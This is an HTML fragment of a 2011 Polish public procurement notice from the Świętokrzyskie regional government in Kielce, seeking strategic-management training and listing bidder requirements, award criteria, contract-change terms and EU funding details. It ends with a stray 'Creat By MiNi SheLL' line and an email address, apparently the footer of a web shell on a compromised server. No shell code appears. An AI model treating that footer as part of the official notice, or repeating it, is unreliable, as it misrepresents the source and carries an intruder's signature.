wykształcenie wyższe oraz doświadczenie w postaci przeprowadzenia minimum 1 szkolenia grupowego z zarządzania strategicznego w administracji publicznej dla minimum 10 osób.Zamawiający oceni spełnianie tego warunku na podstawie wykazu
osób złożonego przez Wykonawcę wg wzoru stanowiącego dodatek nr 2C do SIWZ (wykaz
osób )-oryginał lub kopia poświadczone za zgodność z oryginałem przez wykonawcę, metodą
spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać sie Wykonawcy, którzy znajdują się w sytuacji
ekonomicznej i finansowej niezbędnej do prawidłowej realizacji zamówienia. Zamawiający oceni
spełnianie tego warunku na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu
warunków udziału w postępowaniu, (art. 22 ust. 1 ustawy) - wg wzoru określonego w dodatku nr
2A do SIWZ - oryginał, metodą spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty - wg wzoru określonego w Dodatku nr 1 do SIWZ.
2.	W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (w tym spółki cywilne) - pełnomocnictwo do reprezentowania 
w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania 
w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub poświadczona notarialnie kopia). 
3.	Pełnomocnictwo określające jego zakres - w przypadku, gdy Wykonawcę reprezentuje pełnomocnik (oryginał, poświadczona notarialnie kopia). 
4.Wykonawca, który będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (art. 26 ust. 2b) zobowiązany jest do złożenia pisemnych zobowiązań tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - oryginał podpisany przez podmiot.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy wg wzoru stanowiącego Dodatek nr 3 do niniejszej SIWZ. Zmiany umowy wymagają formy pisemnej. Zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie udzielenia zamówienia publicznego na zawartych w niej warunkach. 
2.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 3, 4 i 5. 
3.	W szczególnie uzasadnionych przypadkach Wykonawca może dokonać wymiany osób delegowanych do wykonania przedmiotu umowy. W takiej sytuacji Wykonawca wskaże osobę y o co najmniej takich samych kwalifikacjach. Zmiana ta nie wymaga formy pisemnej, o której mowa w ust. 1.
4.	W szczególnie uzasadnionych przypadkach termin zakończenia modułów szkolenia może ulec zmianie, pod warunkiem zaakceptowania tych zmian przez strony umowy oraz pod warunkiem, że szkolenia odbędą się w dni powszednie tj. od poniedziałku do piątku. 
5.	Zamawiający dopuszcza możliwość zmiany ceny umowy po przeprowadzeniu negocjacji i zawarciu stosownego aneksu w przypadku ustawowej zmiany stawki podatku od towarów i usług VAT dla przedmiotu umowy w sytuacji łącznego spełnienia dwóch przesłanek:
a)	gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art. 3571k.c. 
b)	zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy.
6.	Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego AL.IX Wieków Kielc 3 ;25-516 Kielce, budynek C-2 III piętro pokój nr 347.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2011 godzina 12:00, miejsce: siedziba Zamawiającego AL.IX Wieków Kielc 3 ;25-516 Kielce, budynek C-2 I piętro kancelaria ogólna pokój nr 146.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projektu pn: Rozwój systemu kluczowych
obszarów funkcjonowania i kompetencji kadr Urzędu Marszałkowskiego Województwa Świętokrzyskiego
realizowanego przez Urząd Marszałkowski Województwa Świętokrzyskiego współfinansowanego z
Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki w ramach
Priorytetu V Dobre rządzenie, Działania 5.2-Wzmocnienie potencjału administracji samorządowej,
Poddziałania 5.2.1 Modernizacja zarządzania w administracji samorządowej oraz Budżetu Krajowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com